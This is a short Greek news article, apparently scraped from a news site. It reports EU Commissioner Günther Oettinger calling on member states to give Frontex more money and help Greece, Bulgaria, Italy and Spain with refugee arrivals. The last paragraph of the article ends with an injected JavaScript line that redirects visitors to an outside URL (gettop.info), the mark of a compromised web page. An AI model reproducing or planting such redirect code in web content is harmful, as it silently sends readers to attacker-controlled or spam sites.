Έτινγκερ: Να αυξηθεί η χρηματοδότηση της Frontex για την Ελλάδα

0
16

 

Τη χρηματοδότηση της Frontex ζήτησε ο Επίτροπος για την Ψηφιακή Οικονομία και την Κοινωνία Γκίντερ Ετινγκερ από τις 27 χώρες της Ευρωπαϊκής Ενωσης μετά τη σύνοδο της Μπρατισλάβας τονίζοντας πως «προσδοκούμε ότι οι χώρες μέλη της Ε.Ε. θα θέσουν στη διάθεση της Frotnex περισσότερα χρήματα».

Όπως τόνισε ο Επίτροπος σε συνέντευξή του στην Rheinische Post, «χρειαζόμαστε επιτέλους περισσότερο προσωπικό για τη φύλαξη των εξωτερικών μας συνόρων. Θεωρούμε ότι δεν είναι αδιάφορο στα κράτη μέλη να μην κάνουν τίποτα ή να κάνουν πολύ λίγα για τη φύλαξη των κοινών ευρωπαϊκών συνόρων».

Και πρόσθεσε: «Εν ανάγκη πρέπει να αναφέρουμε συγκεκριμένα τις χώρες οι οποίες δεν τηρούν τις δεσμεύσεις τους» Ολες οι χώρες οι οποίες δεν έχουν σύνορα με την Τουρκία πρέπει να βοηθήσουν περισσότερο τις χώρες οι οποίες πλήττονται από το προσφυγικό κύμα όπως είναι η Ελλάδα, η Βουλγαρία, η Ιταλία και η Ισπανία.

Αυτό ισχύει για χώρες όπως η Γερμανία, το Λουξεμβούργο, η Γαλλία, η Αυστρία, Δανία. Αυτές οι χώρες πρέπει να αυξήσουν την παροχή βοήθειας στις επιβαρυμένες χώρες της Μεσογείου», τόνισε ο Έτινγκερ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here